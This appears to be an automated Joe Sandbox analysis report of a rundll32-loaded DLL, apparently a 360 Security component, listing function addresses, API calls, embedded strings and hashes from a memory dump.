Opcode ID: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction ID: c2b84f69b377f8d486519554b3a5ef31eab8a077f1ecb1a3c09cbb62b7b5dce0
Opcode Fuzzy Hash: af4d7778e813cec4d2260f242f830c925d5e0839e1a4af0d89802f64c8607ec2
Instruction Fuzzy Hash: A5A19E36302A4881EBE79F15D8403E963A1FB58BD4F45C116EA5E5B6E9DF38CB89D300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180031364 Relevance: 15.2, APIs: 5, Strings: 5, Instructions: 232COMMON

Download Yara Rule

APIs

StrStrIW.SHLWAPI ref: 0000000180031395
_wcsicmp.MSVCRT ref: 0000000180031431
wcsstr.MSVCRT ref: 00000001800314B8

Part of subcall function 000000018000507C: memmove.MSVCRT ref: 0000000180005116

wcsstr.MSVCRT ref: 0000000180031514
StrStrIW.SHLWAPI ref: 0000000180031647

Strings

refresh, xrefs: 0000000180031426
http-equiv, xrefs: 0000000180031411
<meta, xrefs: 000000018003138B, 000000018003163D
url, xrefs: 00000001800314EC
content, xrefs: 0000000180031493, 00000001800315EB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$_wcsicmpmemmove
String ID: <meta$content$http-equiv$refresh$url
API String ID: 2361349637-3031182906
Opcode ID: 07de686381712597efe178b2a7e918757f008e94124c5655b5487fb9c73d084c
Instruction ID: c68d1c126d757315b10cfd3afd0c940563a20cd601959deafe1f98214d546180
Opcode Fuzzy Hash: 07de686381712597efe178b2a7e918757f008e94124c5655b5487fb9c73d084c
Instruction Fuzzy Hash: D1A17372701A498AEB568F69C8507DD23A1F74CBF5F45C216EA2943BD4EF78CA89C340

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800421D4 Relevance: 15.2, APIs: 10, Instructions: 163networkCOMMON

Download Yara Rule

APIs

??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423F9

Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 0000000180042FFB
Part of subcall function 0000000180042FC4: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043016
Part of subcall function 0000000180042FC4: WideCharToMultiByte.KERNEL32 ref: 000000018004306B

Part of subcall function 0000000180066050: EnterCriticalSection.KERNEL32 ref: 0000000180066098
Part of subcall function 0000000180066050: LeaveCriticalSection.KERNEL32 ref: 00000001800660E1

Part of subcall function 0000000180043154: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043187
Part of subcall function 0000000180043154: htonl.WS2_32 ref: 00000001800431F3

??_V@YAXPEAX@Z.MSVCRT ref: 000000018004228E
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800422DA
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042302
htons.WS2_32 ref: 000000018004234A
htonl.WS2_32 ref: 0000000180042358
htons.WS2_32 ref: 0000000180042366
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0000000180042385
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423AB
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800423D3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharCriticalMultiSectionWidehtonlhtons$EnterLeavememmove
String ID:
API String ID: 505489203-0
Opcode ID: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction ID: 546e40b67bc81cdcf22b9085e67948acfa9500907e31d87aed3a5e4506fe483b
Opcode Fuzzy Hash: a07653937a79e70b2ab9cb09c4e22017cd899243124cbf7044e450a9eefd8b59
Instruction Fuzzy Hash: A6711C32B05B548AFB96CFA1E8403ED33B5B70879DF468025EE5627A98DF38C659C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180052280 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 220COMMON

Download Yara Rule

Strings

%s\NameSpace_Catalog5\Catalog_Entries64\%012d, xrefs: 0000000180052353
Num_Catalog_Entries64, xrefs: 000000018005233F
%s\NameSpace_Catalog5\Catalog_Entries\%012d, xrefs: 000000018005235A, 0000000180052631
SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5, xrefs: 00000001800523AF
Num_Catalog_Entries, xrefs: 0000000180052346

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID:
String ID: %s\NameSpace_Catalog5\Catalog_Entries64\%012d$%s\NameSpace_Catalog5\Catalog_Entries\%012d$Num_Catalog_Entries$Num_Catalog_Entries64$SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\NameSpace_Catalog5
API String ID: 0-1196714001
Opcode ID: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction ID: 902fc08f0a24e927d00bac490aa4b2e4fc0ab2cffff010c51715f7c20a33671b
Opcode Fuzzy Hash: 568fd741c3bdcc21c426c5afc4ac46b45918c5554304f1a676603b4f6589036a
Instruction Fuzzy Hash: 8B91E232701B4886EB96CB62A8407D973A0FB8DBD4F058225BF6D17795EF39CA49C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000018002C720 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

StringFromGUID2.OLE32 ref: 000000018002C7A1
_wcsupr.MSVCRT ref: 000000018002C7AF
SysFreeString.OLEAUT32 ref: 000000018002C8DA
??_V@YAXPEAX@Z.MSVCRT ref: 000000018002C8EC
??3@YAXPEAX@Z.MSVCRT ref: 000000018002C8FE
_wtoi.MSVCRT ref: 000000018002C9F2

Strings

internetshortcut, xrefs: 000000018002C96B
hotkey, xrefs: 000000018002C95A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: String$??3@FreeFromHeapProcess_wcsupr_wtoi
String ID: hotkey$internetshortcut
API String ID: 2885337837-1159320594
Opcode ID: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction ID: 4557ede77b3344c9b7d134b2ef366cc1eba795b6e68afc4d6349487d3a9816dc
Opcode Fuzzy Hash: a2454b8e8b8246686a3b2ba7e9ac3c3560326eba55912cdd4e74c1efac8119ef
Instruction Fuzzy Hash: 56915972701B4886EB96DF69D84079D33A0F748BE4F44C626AA6D477E4DF38CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AA00 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 156sleepthreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000000018003AA41
Sleep.KERNEL32(?,?,?,?,00000000), ref: 000000018003AA64

Strings

JudgeVersion, xrefs: 000000018003AB6A

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CurrentSleepThread
String ID: JudgeVersion
API String ID: 1164918020-3141317846
Opcode ID: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction ID: 47c15e1018a900855fb3b169089698e2b9417bb7c9542535bb0a2760737ebbf6
Opcode Fuzzy Hash: 2437360cf512e5b62a46a09ef29253c79db304fd769a9f3e4dce4e3854d29d87
Instruction Fuzzy Hash: EE51AB32604A889AFB979F65DD843DE73A1F3097D4F468525EA2A83790DF34CA99C340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005E750 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152filesynchronizationCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32 ref: 000000018005E831
GetFileAttributesW.KERNEL32 ref: 000000018005E898
SetFileAttributesW.KERNEL32 ref: 000000018005E8B3
DeleteFileW.KERNEL32 ref: 000000018005E909
GetLastError.KERNEL32 ref: 000000018005E919
GetLastError.KERNEL32 ref: 000000018005E921
ReleaseMutex.KERNEL32 ref: 000000018005E936

Strings

PRAGMA synchronous = OFF;, xrefs: 000000018005E7E9, 000000018005E87B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$AttributesDeleteErrorLast$MutexRelease
String ID: PRAGMA synchronous = OFF;
API String ID: 874664252-1854902270
Opcode ID: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction ID: fa77642fd0660764f5a509da37546a8681fbf34ddf7b90f5fa11f8d2a21f9c13
Opcode Fuzzy Hash: 1145e7b794f1c9dbefaeeafce65ce3907897fb728955ac70424f53ad1c5898c9
Instruction Fuzzy Hash: 6551A335700B8996FEDE8F6594517B92390AB4DBD4F048524BEAE677E0DF35CA098300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800570A0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800570E7
GetModuleFileNameW.KERNEL32 ref: 00000001800570FE
PathRemoveFileSpecW.SHLWAPI ref: 0000000180057109
PathFileExistsW.SHLWAPI ref: 000000018005715E
PathFileExistsW.SHLWAPI ref: 00000001800571E7

Strings

%hd.%hd.%hd.%hd, xrefs: 0000000180057233
\QHVer.dll, xrefs: 0000000180057178
\360ver.dll, xrefs: 000000018005711F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Path$Exists$ModuleNameRemoveSpecmemset
String ID: %hd.%hd.%hd.%hd$\360ver.dll$\QHVer.dll
API String ID: 3680197243-1037704697
Opcode ID: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
Instruction ID: 3305af636dff0720fe62b84610ade698e39c861821be0ce054630d245facfc05
Opcode Fuzzy Hash: 3e80556d967b03fa81a8d0e192ef84c8c157516f2ebd988b45dcbe8060877e80
Instruction Fuzzy Hash: 73516572701A4982E751DB29D84078A77A0F789BF4F408212FA6D877E5DF39CA49CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044568 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 146COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800445B0

Part of subcall function 00000001800463BC: ??2@YAPEAX_K@Z.MSVCRT ref: 00000001800463D3

GetTickCount.KERNEL32 ref: 000000018004461F
srand.MSVCRT ref: 0000000180044627
rand.MSVCRT ref: 000000018004462D
rand.MSVCRT ref: 0000000180044651
InitializeCriticalSection.KERNEL32 ref: 0000000180044763

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 000000018004483D
Part of subcall function 0000000180044810: ??3@YAXPEAX@Z.MSVCRT ref: 000000018004488A
Part of subcall function 0000000180044810: DeleteCriticalSection.KERNEL32 ref: 00000001800448AA

??3@YAXPEAX@Z.MSVCRT ref: 00000001800447A5

Strings

http://%s/dquery, xrefs: 00000001800446A3, 00000001800446F3

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@CriticalSection$??3@Deleterand$CountInitializeTickmemsetsrand
String ID: http://%s/dquery
API String ID: 3689213441-2489601265
Opcode ID: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction ID: 80c6b5da0a524930356cbb69355e12e6cacd4ac9a253962bc35af1aeed2dd264
Opcode Fuzzy Hash: 3d6c1d3a1db6c1d00b31d5721a07cc2654ec57c957b64071c42c049315398c83
Instruction Fuzzy Hash: F3619076211F4986E7829B64EC843D933A0FB497A8F518316ED29076E5EF78C78DC344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005ECC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 0000000180018E8C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018E96
Part of subcall function 0000000180018E8C: CreateFileW.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018EC6
Part of subcall function 0000000180018E8C: DeviceIoControl.KERNEL32 ref: 0000000180018F04
Part of subcall function 0000000180018E8C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,0000000180065B3D), ref: 0000000180018F0F

memset.MSVCRT ref: 000000018005ED13
GetModuleFileNameW.KERNEL32 ref: 000000018005ED24

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

GetModuleFileNameW.KERNEL32 ref: 000000018005ED55
PathAppendW.SHLWAPI ref: 000000018005ED69
PathFileExistsW.SHLWAPI ref: 000000018005EDD0

Strings

\Config\MessageCenter.db, xrefs: 000000018005ED93
\deepscan\heavygate64.dll, xrefs: 000000018005EDBA
\heavygate64.dll, xrefs: 000000018005EDEE

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$Path$CriticalExistsModuleNameSection$AppendCloseControlCreateCurrentDeviceEnterHandleLeaveProcessmemset
String ID: \Config\MessageCenter.db$\deepscan\heavygate64.dll$\heavygate64.dll
API String ID: 830827343-1853890022
Opcode ID: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction ID: ed8f6b5c495fe7c06dfc5e892af335cc1c0a2688f7bbfb93a7c5ae832a2d3b97
Opcode Fuzzy Hash: 298258ffcac91158a1fef4f3201ca6457f5d35ecb6e0b41006b5da1b8766b288
Instruction Fuzzy Hash: 12413B72214A8995EBB5DF21EC413D92360F7897C8F808112FA4D9B5A9DF39C70DCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004288 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 79COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800042C6

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetFileAttributesW.KERNEL32 ref: 00000001800042FA
memset.MSVCRT ref: 0000000180004316
ILCreateFromPath.SHELL32 ref: 0000000180004330
ILCombine.SHELL32 ref: 000000018000437A
CoTaskMemFree.OLE32 ref: 0000000180004387
CoTaskMemFree.OLE32 ref: 0000000180004394

Strings

:, xrefs: 00000001800042E7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: FreeFromPathTaskmemset$AttributesCombineCreateFileList
String ID: :
API String ID: 2941325240-336475711
Opcode ID: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction ID: dc65f2bc49bddac93e31888ce9d3fd3537e0c7ef9c239f6ea7558133a88505f1
Opcode Fuzzy Hash: b7718fc7bab466bf75feea53bf66271dcee3e8f8e01a932515278184e63cf5ba
Instruction Fuzzy Hash: 7731747260458881EAB5DB16E4543ED7361FB8CBC4F44D115FA4E86AA5DF3CCB49C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060A0C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0000000180060A59
GetClassNameW.USER32 ref: 0000000180060A6C
StrCmpIW.SHLWAPI ref: 0000000180060A8C
StrCmpIW.SHLWAPI ref: 0000000180060AAD
GetWindowTextW.USER32 ref: 0000000180060AC5
StrStrIW.SHLWAPI ref: 0000000180060AE0

Strings

ApplicationFrameWindow, xrefs: 0000000180060AA6
Microsoft Edge, xrefs: 0000000180060AD4

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ClassNameTextWindowmemset
String ID: ApplicationFrameWindow$Microsoft Edge
API String ID: 1817102812-2764675319
Opcode ID: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction ID: cbb3fe303a1e4ce820f684c33e5910fd11efe3c021ca595ae8cabc946684c7f6
Opcode Fuzzy Hash: bdc5f29d5c31fe96e361a90c3735c845403ae182fb6ea73bd058871bc7ed945a
Instruction Fuzzy Hash: 3721943135478985FAA19F65E8843DA6361F78C7C4F648125AAAD872A4EF7CC74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008B5C Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 66libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008B8A
GetProcAddress.KERNEL32 ref: 0000000180008B9F
RegDeleteKeyW.ADVAPI32 ref: 0000000180008BD1
GetModuleHandleW.KERNEL32 ref: 0000000180008BFE
GetProcAddress.KERNEL32 ref: 0000000180008C13

Strings

RegDeleteKeyTransactedW, xrefs: 0000000180008B95
RegDeleteKeyExW, xrefs: 0000000180008C09
Advapi32.dll, xrefs: 0000000180008B83, 0000000180008BF7

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction ID: 915c5fbfce3db82b286e5c0612373c0c02ac60b4c6bcd7d6af2be75d68b23045
Opcode Fuzzy Hash: 0b7aaba438b382d164bc0afc74327b597900df9609eba397915e0a396ce3b562
Instruction Fuzzy Hash: 9F314675209A4891FBA2CB11EC047D973A0BB4DBD4F58C025AE9A07BA4EF3CC748D310

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005F270 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 54filewindowtimeCOMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNEL32(?,?,?,?,?,?,?,?,00000001,000000018005F563), ref: 000000018005F288
FindWindowW.USER32 ref: 000000018005F2A6
SendMessageTimeoutW.USER32 ref: 000000018005F2DA
MapViewOfFile.KERNEL32 ref: 000000018005F307
UnmapViewOfFile.KERNEL32 ref: 000000018005F383
CloseHandle.KERNEL32 ref: 000000018005F391

Strings

Q360GameModeMapping, xrefs: 000000018005F27A
Q360SafeMonClass, xrefs: 000000018005F29F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: File$View$CloseFindHandleMappingMessageOpenSendTimeoutUnmapWindow
String ID: Q360GameModeMapping$Q360SafeMonClass
API String ID: 503113698-2755034037
Opcode ID: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
Instruction ID: ebb1f5daab1ae0be3269addd9342b9779a07a1984474038a4b34f5f783d133e4
Opcode Fuzzy Hash: a3dcdb3015a9b5e320c6dba5c7c91f5af997ec56152cc96ca9df43ba5da0b2dd
Instruction Fuzzy Hash: 65213E36605B4882FBA28F25B9547AAB7A1F78C7C4F458228FA4942B54DF3CD64CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180064DE4 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180064E2F
GetModuleFileNameW.KERNEL32 ref: 0000000180064E51
PathAppendW.SHLWAPI ref: 0000000180064E63
PathAppendW.SHLWAPI ref: 0000000180064E75
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180064E7E

Part of subcall function 000000018006442C: memset.MSVCRT ref: 0000000180064485
Part of subcall function 000000018006442C: InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 000000018006448F
Part of subcall function 000000018006442C: GetLastError.KERNEL32 ref: 000000018006449C
Part of subcall function 000000018006442C: EnterCriticalSection.KERNEL32 ref: 00000001800644C5
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800644DB
Part of subcall function 000000018006442C: GetModuleFileNameW.KERNEL32 ref: 00000001800644F4
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 0000000180064508
Part of subcall function 000000018006442C: PathAppendW.SHLWAPI ref: 000000018006451C
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064549
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006455E
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064573
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 0000000180064588
Part of subcall function 000000018006442C: GetProcAddress.KERNEL32 ref: 000000018006459D
Part of subcall function 000000018006442C: memset.MSVCRT ref: 00000001800645E5

LeaveCriticalSection.KERNEL32 ref: 0000000180064EA8

Strings

..\deepscan\, xrefs: 0000000180064E57
speedmem2.hg, xrefs: 0000000180064E69

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
